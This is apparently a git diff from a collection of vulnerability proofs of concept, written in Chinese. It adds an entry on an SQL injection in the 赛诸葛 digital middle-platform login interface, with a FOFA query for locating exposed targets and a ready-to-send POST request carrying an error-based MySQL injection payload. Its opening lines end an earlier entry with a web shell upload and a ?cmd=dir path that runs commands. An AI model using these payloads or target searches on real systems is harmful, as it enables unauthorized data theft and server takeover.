+Response.End();%>
+------WebKitFormBoundaryFfJZ4PlAZBixjELj--
+```
+
+![image-20241227221622454](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272216534.png)
+
+文件路径
+
+```
+/Files/DB/qwert_yuiop.aspx?cmd=dir
+```
+
diff --git a/赛诸葛/赛诸葛数字化智能中台系统login存在SQL注入漏洞.md b/赛诸葛/赛诸葛数字化智能中台系统login存在SQL注入漏洞.md
new file mode 100644
index 0000000..00a4864
--- /dev/null
+++ b/赛诸葛/赛诸葛数字化智能中台系统login存在SQL注入漏洞.md
@@ -0,0 +1,25 @@
+# 赛诸葛数字化智能中台系统login存在SQL注入漏洞
+
+赛诸葛数字化智能中台系统 login 登录接口存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息。
+
+## fofa
+```javascript
+body="static/index/image/login_left.png" || icon_hash="1056416905"
+```
+
+## poc
+```javascript
+POST /login HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br, zstd
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Connection: keep-alive
+
+username=1')) AND GTID_SUBSET(CONCAT(0x7e,(SELECT (ELT(3469=3469,version()))),0x7e),3469) AND (('fOfY'='fOfY&loginType=1&password=bbb8aae57c104cda40c93843ad5e6db8&phone_head=86&wx_openid=&member=
+```
+
+![image-20241227221000969](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272210041.png)
\ No newline at end of file